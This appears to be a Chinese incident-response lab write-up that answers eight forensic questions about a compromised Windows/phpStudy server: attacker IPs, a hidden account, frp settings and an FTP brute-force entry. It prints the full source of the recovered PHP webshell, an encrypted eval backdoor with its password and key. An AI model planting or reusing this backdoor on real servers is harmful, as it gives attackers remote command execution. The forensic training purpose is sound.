在解题前,请确保您已解的一下内容:
1.攻击者的IP地址(两个)?
2.攻击者的webshell文件名?
3.攻击者的webshell密码?
4.攻击者的QQ号?
5.攻击者的服务器伪IP地址?
6.攻击者的服务器端口?
7.攻击者是如何入侵的(选择题)?
8.攻击者的隐藏用户名?
一、两个ip地址
扫描出来是一个system.php文件
<?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $pass='hack6618'; $payloadName='payload'; $key='7813d1590d28a7dd'; if (isset($_POST[$pass])){ $data=encode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); if (strpos($payload,"getBasicsInfo")===false){ $payload=encode($payload,$key); } eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (strpos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } } }这段PHP代码是一个典型的Webshell后门程序,用于在受感染的服务器上执行远程命令。
然后我们分析日志。
日志路径C:\phpstudy_pro\Extensions\Apache2.4.39\logs
192.168.126.135
接下来我们分析windows的系统日志,使用APT-Hunter工具的powershell日志收集器自动收集日志信息,将得到的日志解压。
Powershell:
cd C:\你的路径\APT-Hunter-3.2解除系统默认脚本执行限制(仅首次需要):
Set-ExecutionPolicy RemoteSigned # 弹出提示输入 Y 确认一键自动采集命令:
.\windows-log-collector-full-v3-CSV.ps1使用 APT-Hunter 主 Python 脚本自动分析这批日志:
python APT-Hunter.py -p C:\Users\Administrator\Desktop\logs\wineventlog -o Project1 -allreport -p:提供包含使用powershell日志收集器提取的日志的解压路径 -o:输出生成项目的名称192.168.126.129
二、攻击者的webshell文件名?
system.php
三、攻击者的webshell密码?
hack6618
四、攻击者的QQ号?
Tecent files 腾讯文件(可能指的是QQ之类的)
攻击者的QQ号:777888999321
五、攻击者的服务器伪IP地址?
在隐藏用户的文件中搜集信息:
FileRecv为QQ的接收的文件夹,发现frp内网穿透工具
找到配置信息查看:
256.256.66.88
六、攻击者的服务器端口?
65536
七、攻击者是如何入侵的(选择题)?
查看ftp日志文件:
分析日志文件,查找后门system.php文件,发现正在进行爆破
八、攻击者的隐藏用户名?
hack887
成功